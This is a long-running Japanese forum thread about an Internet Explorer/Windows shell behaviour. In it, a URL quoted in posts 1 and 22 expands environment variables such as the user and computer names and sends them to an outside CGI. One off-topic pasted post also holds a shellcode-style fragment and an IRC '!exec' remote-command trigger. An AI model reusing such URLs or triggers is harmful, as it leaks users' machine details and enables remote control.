IEの0dayアタック？

1 ：名無しさん＠お腹いっぱい。：04/10/29 16:52:33.net

なんかあるブログを見てたらIEから情報が漏れるみたいなことが書いてあったんですが
これはどういう原理でもれてるんですか？誰か教えてください
ちなみにttp://www.pbh.jp/cgi-bin/t3.cgi?USERDNSDOMAIN=%USERDNSDOMAIN%&USERD
OMAIN=%USERDOMAIN%&USERNAME=%USERNAME%&COMPUTERNAME=%COMPUTERNAME%&Path=%Pa
th%&ComSpec=%ComSpec%&HOMEDRIVE=%HOMEDRIVE%&HOMEPATH=%HOMEPATH%&LOGONSERVER
=%LOGONSERVER%&NUMBER_OF_PROCESSORS=%NUMBER_OF_PROCESSORS%&OS=%OS%&Os2LibPa
th=%Os2LibPath%&PATHEXT=%PATHEXT%&PROCESSOR_ARCHITECTURE=%PROCESSOR_ARCHITE
CTURE%&PROCESSOR_IDENTIFIER=%PROCESSOR_IDENTIFIER%&PROCESSOR_LEVEL=%PROCESS
OR_LEVEL%&PROCESSOR_REVISION=%PROCESSOR_REVISION%&ProgramFiles=%ProgramFile
s%&SystemDrive=%SystemDrive%&SystemRoot=%SystemRoot%&TEMP=%TEMP%&TMP=%TMP%&
USERPROFILE=%USERPROFILE%&windir=%windir%&ALLUSERSPROFILE=%ALLUSERSPROFILE%
&APPDATA=%APPDATA%&CommonProgramFiles=%CommonProgramFiles%&
注意：実際にはURLバーに1行で入れます
にアクセスすると私の名前とかが出てくるんです…

2 ：kmbs：04/10/29 16:54:03.net

2get!

3 ：名無しさん＠お腹いっぱい。：04/10/29 16:54:13.net

えぇー

4 ：名無しさん＠お腹いっぱい。：04/10/29 16:57:36.net

4げと

5 ：名無しさん＠お腹いっぱい。：04/10/29 17:01:43.net

マシンの情報を表示してるだけじゃねえか
くだらん

6 ：5：04/10/29 17:02:58.net

環境変数だな

7 ：名無しさん＠お腹いっぱい。：04/10/29 17:06:25.net

マシンの情報を表示すんのがあなだってことじゃねーの？

8 ：5：04/10/29 17:10:09.net

穴じゃないだろう・・・これは
「仕様」の一言で片付けられるものだと思う

9 ：名無しさん＠お腹いっぱい。：04/10/29 17:23:53.net

リファラがあると表示されないみたいね
コピペで行くと表示される

10 ：名無しさん＠お腹いっぱい。：04/10/29 17:25:47.net

MS社員ハケーン

11 ：名無しさん＠お腹いっぱい。：04/10/30 07:54:48.net

ん、環境変数を％で囲ってURLに入れたら
勝手にその値に置き換えて送信するのか
初めて知った

12 ：名無しさん＠お腹いっぱい。：04/10/30 12:11:59.net

こういうのを「仕様」とかっていうやつ
本当にいるんだねぇ

13 ：名無しさん＠お腹いっぱい。：04/10/30 16:56:14.net

IE(mshtml.dll)単体では展開しないけど、それをくるんでいるシェル部分が勝手に展開しちゃうみたいですね。
その証拠に、シェルを経由しないように、meta refreshを使って環境変数展開を入れたURLに飛んでも展開されてません。
だからIEレンダラを使うぷにる他は無害と見ていいでしょう。

なお、「ファイル名を指定して実行」で同URLを入れても展開されます。
この場合には、既定のブラウザに展開された状態で渡されてます。
(Mozilla等に渡された時点ですでに展開済み)

激しく既知だろうからsageとく。

14 ：名無しさん＠お腹いっぱい。：04/11/02 11:59:15.net

仕様は仕様だと思うよ。すくなくとも bug じゃない印象。

ただし、「悪用される恐れのある仕様」のように思われるので、
MS には仕様変更をキボン

15 ：名無しさん＠お腹いっぱい。：04/11/05 18:11:47.net

http://d.hatena.ne.jp/anemo/20041027

ここに詳しい

16 ：名無しさん＠お腹いっぱい。：04/11/14 01:43:06.net

うわーこれはおもしろいです。
なんか使えそうですね！

17 ：名無しさん＠お腹いっぱい。：05/01/13 22:08:20.net

>>1
乙

18 ：名無しさん＠お腹いっぱい。：05/01/15 19:02:10.net

　　∧＿∧
　 （　・∀・）　　　|　|　ｶﾞｯ
　と　　　　）　 　 |　|
　　 Ｙ　/ノ 　 　 人
　　　 /　）　 　 < 　>__Λ∩
　 ＿/し'　／／. Ｖ｀Д´）/
　（＿フ彡

19 ：名無しさん＠お腹いっぱい。：05/02/27 00:22:19 .net

hoshu
b

20 ：名無しさん＠お腹いっぱい。：05/03/05 23:14:41 .net

nurupo

21 ：名無しさん＠お腹いっぱい。：05/03/06 19:46:03 .net

　　∧＿∧
　 （　・∀・）　　　|　|　ｶﾞｯ
　と　　　　）　 　 |　|
　　 Ｙ　/ノ 　 　 人
　　　 /　）　 　 < 　>__Λ∩
　 ＿/し'　／／. Ｖ｀Д´）/
　（＿フ彡

22 ：名無しさん＠お腹いっぱい。：05/03/06 22:15:29 .net

http://www.pbh.jp/cgi-bin/t3.cgi?USERDNSDOMAIN=%USERDNSDOMAIN%&USERDOMAIN=%USERDOMAIN%&USERNAME=%USERNAME%&COMPUTERNAME=%COMPUTERNAME%&Path=%Pa
th%&ComSpec=%ComSpec%&HOMEDRIVE=%HOMEDRIVE%&HOMEPATH=%HOMEPATH%&LOGONSERVER
=%LOGONSERVER%&NUMBER_OF_PROCESSORS=%NUMBER_OF_PROCESSORS%&OS=%OS%&Os2LibPa
th=%Os2LibPath%&PATHEXT=%PATHEXT%&PROCESSOR_ARCHITECTURE=%PROCESSOR_ARCHITE
CTURE%&PROCESSOR_IDENTIFIER=%PROCESSOR_IDENTIFIER%&PROCESSOR_LEVEL=%PROCESS
OR_LEVEL%&PROCESSOR_REVISION=%PROCESSOR_REVISION%&ProgramFiles=%ProgramFile
s%&SystemDrive=%SystemDrive%&SystemRoot=%SystemRoot%&TEMP=%TEMP%&TMP=%TMP%&
USERPROFILE=%USERPROFILE%&windir=%windir%&ALLUSERSPROFILE=%ALLUSERSPROFILE%
&APPDATA=%APPDATA%&CommonProgramFiles=%CommonProgramFiles%&nullpo

23 ：名無しさん＠お腹いっぱい。：05/03/07 10:38:47 .net

　　　　　　　（　 _,, -''"　　　　　 ',　　　　　　　　　　　　　　　　　　　　　　　　　　　 　 　 ＿＿＿_
　 　 ニ　 　 .（　l　　　　　　　　　',＿＿_＿,､　　 　　　　.,.. ､.　　　　　　　　　　　　 　 ／　　　 　 ＼
　　　ハ　　　（　.',　　　　　　　　　ﾄ───‐'　　　　　／r.､_,ヽ'ﾃ`---. ､　　　　 　 　 ｌ 　　　　　　 │
　　　ハ　　　（　 .',　　　　　　　　　|.　　　　　　 　 ,. '"　'", ‐ﾞ"　　　　　　 `'ｰ-.､　　　|　　ニ　仕 　 |
　　　　　　　（　／ｨ　　　　　　　　　ｈ 　 　 　 　 /　 .,. ﾔ　,　　,　　 　 　 ヽ　 ､ヽ.ヽ　 |　　ハ　様　│
⌒⌒⌒ヽ(⌒ヽ／　',　　　　　　　　 ｌ.ｌ　　　　　　ゝ 〈　i.　 i.　　| i.　 l i.　l',. ヽ　ﾞi. ヾヽ |　　ハ　だ｜
　　　　　　　￣　　　',　　　　　　　ｆｌｌＪ　　 　 　 /　ゝ/l.　 |　　,li'+ ﾒ l | / ';ヾ',　 l､ l　' | 　 ！　　　│
　　　　　　　　　　　　ヾ　　　　 ﾙ'ﾉ　|ll　　　　./ / `ｶ"l　 |　 ´| ﾚ'　　ﾚ　 .l'　.i　| ',.|　 ｌ 　　　　　 　 |
　　　　　　　　　　　　　〉vw'ﾚﾊﾉ　　 l.lll..　　../　i . 〃　', ,|　　,l ／　　　 ヽ　 l.',.l　 ﾘ . ヽ　 __＿＿／
　　　　　　　　　　　　　l_,,, =====､_　!'lll　　./　 i　〃　 .`{|　　|'''' ヽ---/　ﾞﾞﾞi　',-く.　 　 )ノ
　　　　　　　　　　＿,,ノ※※※※※｀ｰ,, 　/　 i　/.!.　　 | l　　| 　　＼/　._, ｲ　 ',. ヾ
　　　　　　　-‐'"´　ヽ※※※※※_,, -''"｀''ｰ-､'　.L_ 　 | li　　iヾｰ---rﾍi　 |　　',　l
　　　　　　　　　　　　 ￣￣￣￣￣　　　　　　　｀''ｰ-､..,ﾊ|.i 　 ', ﾐ.T'iノ　.||.　|.　　', !

24 ：名無しさん＠お腹いっぱい。：2005/03/23(水) 23:10:15 .net

　　∧＿∧
　 （　・∀・）　　　|　|　ｶﾞｯ
　と　　　　）　 　 |　|
　　 Ｙ　/ノ 　 　 人
　　　 /　）　 　 < 　>__Λ∩
　 ＿/し'　／／. Ｖ｀Д´）/ 　→>>22
　（＿フ彡

25 ：名無しさん＠お腹いっぱい。：2005/07/08(金) 13:25:32 .net

パイズリ

26 ：名無しさん＠お腹いっぱい。：2006/06/03(土) 10:07:50 .net

おめこ

27 ：名無しさん＠お腹いっぱい。：2006/08/18(金) 23:30:24 .net

一太郎も0 dayアタック
NHKニュースでも話題に
狙いは日本政府の機密情報だとか（ホンマかいな）

一太郎2005/2006 セキュリティ更新モジュール
http://www3.justsystem.co.jp/download/ichitaro/up/win/060818.html

28 ：IE7入手先：2007/03/17(土) 17:32:37 .net

MSN版IE7
http://promotion.msn.co.jp/ie7/
http://download.msn.co.jp/download.aspx/sid=I7bzPs2A/ie7setup.exe

Yahoo版IE7
http://recommend.yahoo.co.jp/ie7/campaign/index.html
http://recommend.yahoo.co.jp/ie7/index.html
http://a109.g.akamai.net/7/109/31749/000/downloads.yahoo.co.jp/browser/ie/7/IE7Setup.exe

Google版IE7
http://www.google.com/toolbar/ie7/intl/ja/
http://dl.google.com/toolbar/data/ie7/IE7Setup_G_JP.exe

29 ：名無しさん＠お腹いっぱい。：2007/04/10(火) 22:57:55 .net

ｹﾞﾗｹﾞﾗ

30 ：名無しさん＠お腹いっぱい。：2007/09/16(日) 19:32:11 .net

>10
>12
一人が叩くと雪崩を打つように「チキン野郎」が叩き始める良い例だなｗ

31 ：名無しさん＠お腹いっぱい。：2009/10/11(日) 20:31:37 .net

マシンの情報を表示してるだけだろう
心配することはないんではないか

32 ：名無しさん＠お腹いっぱい。：2010/11/08(月) 11:08:54 .net

♥

33 ：名無しさん＠お腹いっぱい。：2011/01/06(木) 22:55:28 .net

4 ：ｚ：2010/08/28(土) 10:25:02 ID:NtVfNVmU0
452 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。

ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/

漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
454 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか？
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか？

34 ： 忍法帖【Lv=40,xxxPT】(7+0：8) 【43.5m】 電脳プリオン ◆3YKmpu7JR7Ic ：2013/01/06(日) 13:36:17.17 ?PLT(12079).net

９でもなる？

35 ：名無しさん＠お腹いっぱい。：2013/11/25(月) 21:46:42.67 .net

正当防衛は通用するんかな？

36 ：名無しさん＠お腹いっぱい。：2014/09/27(土) 20:15:10.32 .net

7

37 ：名無しさん＠お腹いっぱい。：2014/10/05(日) 23:26:33.79 .net

8